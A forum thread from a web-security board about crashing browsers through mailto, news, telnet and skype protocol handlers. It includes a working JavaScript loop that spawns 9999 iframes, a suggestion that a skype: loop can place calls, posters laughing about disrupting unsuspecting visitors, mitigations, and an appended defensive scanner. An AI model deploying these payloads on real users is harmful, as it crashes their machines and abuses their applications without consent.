Sla.ckers.org
How do we crash systems, browsers, or otherwise bring things to a halt, and how do we protect those things? 
Memory exhaustion via mailto tags
Posted by: rsnake
Date: August 21, 2006 12:24PM

One of the things I built was the mailto tag popup DoS located here: http://ha.ckers.org/weird/popup.html

I was playing around with other ways to do this, like perhaps include things like news:// or other directives that could spawn additional resources towards the end goal of memory exhaustion or otherwise getting the user so confused that they cannot stop whatever is happening. I have a feeling there is an exploit buried in here, beyond buffer overflows, but actually through the art of confusion and user panic.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Memory exhaustion via mailto tags
Posted by: rsnake
Date: September 01, 2006 08:01PM

Well my stupid little mailto DoS got on Digg (waaaaay down the page). In one day a thousand people went to that page. 1000 people had their day ruined: http://www.digg.com/security/How_To_Crash_Internet_Explorer

- RSnake
Gotta love it. http://ha.ckers.org

Re: Memory exhaustion via mailto tags
Posted by: WhiteAcid
Date: September 01, 2006 09:27PM

Go to about:config, set network.protocol-handler.external.mailto to false. Firefox will no longer have mailto: do anything.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Memory exhaustion via mailto tags
Date: September 02, 2006 10:59AM

Hmm... I might just do that, even though it also disables somewhat useful mailto links. It takes way too long for Thunderbird to boot up anyway.

Re: Memory exhaustion via mailto tags
Posted by: rsnake
Date: September 02, 2006 12:04PM

Thank you, WhiteAcid, that's great... I accidentally nailed myself with my own script the other day. Even though I caught it almost immediately it had enough time to still spawn about 50 windows. Ugh!

- RSnake
Gotta love it. http://ha.ckers.org

Re: Memory exhaustion via mailto tags
Posted by: Moccah
Date: July 01, 2007 04:59PM

Still, while setting network.protocol-handler.external.mailto to false, Firefox crashes. I guess this is because there is a script that loops the <IFRAME></IFRAME> tag an awful lot of times?

If I stop the page load, Firefox hangs a bit and eats up all of my CPU for a short period, but eventually it drops and gets normal.

Man, I got annoyed when I clicked the link .. (d'oh) Oh well, long live the curiosity :P



Edited 1 time(s). Last edit at 07/01/2007 05:07PM by Moccah.

Re: Memory exhaustion via mailto tags
Posted by: Kyran
Date: September 25, 2007 09:49PM

I never should have told RSnake to add that damn refresh. Even being safe from the mailto crash, that page kills me too.

- Kyran

Re: Memory exhaustion via mailto tags
Posted by: rsnake
Date: December 09, 2007 09:40PM

hahah... not super practical but good for a laugh.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Memory exhaustion via mailto tags
Posted by: kefka
Date: April 17, 2008 11:25AM

For the record, it's even more painful if your default application is something monstrous (like Lotus Notes).

Just imagine, I'm sure you'll chuckle.

Re: Memory exhaustion via mailto tags
Posted by: Metahuman
Date: May 08, 2008 08:45AM

Erm, this seems to have been fixed with the newer version of Firefox.

meta-human.net

Re: Memory exhaustion via mailto tags
Posted by: rsnake
Date: June 09, 2008 10:22AM

How is it fixed out of curiosity? Can it only instantiate it once or something?

- RSnake
Gotta love it. http://ha.ckers.org

Re: Memory exhaustion via mailto tags
Posted by: trev
Date: July 03, 2008 07:37AM

Nope, doesn't seem fixed.

Re: Memory exhaustion via mailto tags
Posted by: asilvermtzion
Date: August 15, 2008 04:48PM

Haha, tested this on my brother, it spawned enough IE windows that the only way out was a reboot. How the heck does it work even with JavaScript disabled?

Re: Memory exhaustion via mailto tags
Posted by: PaPPy
Date: August 17, 2008 11:13AM

JavaScript has nothing to do with mailto: it's how your browser/mail client handles it when a mailto link is launched.

http://www.xssed.com/archive/author=PaPPy/

Re: Memory exhaustion via mailto tags
Posted by: ma1
Date: August 17, 2008 12:00PM

@RSnake, Metahuman, trev:
maybe Metahuman believed it was fixed because he's using NoScript, which has been blocking this kind of "attack" (automatic opening of external protocol URLs) for a long time.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Memory exhaustion via mailto tags
Posted by: p0deje
Date: September 22, 2009 10:39AM

I've coded one more thing that definitely makes the user panic, but it works in Safari on Windows only, because it allows opening external Telnet applications.
Maybe it also works on MacOS - I haven't been able to test.
Try it in your Safari :) Combined with mailto confusion it becomes a totally cool thing. Going to post it on the blog.
Besides, I think there are some ways to seriously exploit the external application handler in Safari. Maybe play around with file:/// or something like that?
<body />
<script>
    function makeFrameTelnet() {
    ifrm = document.createElement("IFRAME");
    ifrm.src = 'telnet://nonexistent.com:80';
    document.body.appendChild(ifrm);
    }
</script>
<script>
    function makeFrameNews() {
    ifrm = document.createElement("IFRAME");
    ifrm.src = 'news://nonexistent.com';
    document.body.appendChild(ifrm);
    }
</script>
<script>
    for (i=0; i < 9999; i++) {
    makeFrameTelnet()
    makeFrameNews()
    }
</script>

---------
http://p0deje.blogspot.com

Re: Memory exhaustion via mailto tags
Posted by: p0deje
Date: September 24, 2009 06:00AM

The external application handler really sucks in Safari (and in IE too).
For example, using an iframe with src="skype:echo123?call" in an infinite loop makes Skype call there.
It seems that there are certain ways for spamming using Safari and the Skype URI.

---------
http://p0deje.blogspot.com

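What ma1 describes NoScript blocking, automatic opening of external protocol URLs, can also be checked for statically. The following is an added example, not code from any poster in this thread or from NoScript: a heuristic JavaScript scanner that flags frames whose URL uses one of the schemes named in the thread, whether written as markup or assigned to `.src` in a script, while leaving ordinary clickable mailto links alone. The function names and the sample page are constructed for illustration.

```javascript
// Added example: flag frames that load external-protocol URLs without a click.
// Scheme list is taken from this thread; extend it for your environment.
const EXTERNAL_SCHEMES = ['mailto', 'news', 'telnet', 'skype'];

function schemeOf(url) {
  // Tabs/newlines and leading spaces are dropped, as browsers do when parsing URLs.
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url.replace(/[\t\r\n]/g, '').trim());
  return m ? m[1].toLowerCase() : null;
}

function findAutoProtocolLoads(html) {
  const findings = [];
  // 1) Static markup: <iframe src=...> / <frame src=...>, which needs no JavaScript.
  const tagRe = /<(iframe|frame)\b([^>]*)>/gi;
  const srcRe = /(?:^|\s)src\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
  for (const tag of html.matchAll(tagRe)) {
    const attr = srcRe.exec(tag[2]);
    if (!attr) continue;
    const url = attr[1] ?? attr[2] ?? attr[3];
    const scheme = schemeOf(url);
    if (EXTERNAL_SCHEMES.includes(scheme)) {
      findings.push({ via: tag[1].toLowerCase(), scheme, url: url.trim() });
    }
  }
  // 2) Script-built frames: a string literal assigned to ".src".
  for (const js of html.matchAll(/\.src\s*=\s*(['"])([^'"]*)\1/g)) {
    const scheme = schemeOf(js[2]);
    if (EXTERNAL_SCHEMES.includes(scheme)) {
      findings.push({ via: 'script', scheme, url: js[2] });
    }
  }
  return findings; // heuristic only: no entity decoding, no script execution
}

// Constructed sample page (not from the thread).
const SAMPLE_PAGE = `
<a href="mailto:help@example.com">contact us</a>
<iframe src="mailto:a@example.com"></iframe>
<IFRAME SRC='news://news.example.com'></IFRAME>
<iframe data-src="telnet://host.example.com" src="/ok.html"></iframe>
<script>var f = document.createElement("iframe"); f.src = 'skype:echo123?call';</script>
`;

for (const f of findAutoProtocolLoads(SAMPLE_PAGE)) {
  console.log(`${f.via}: ${f.scheme} -> ${f.url}`);
}
```

The clickable `<a href="mailto:...">` link and the frame with an ordinary `src` are not reported, so a filter built on this keeps useful mailto links working.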

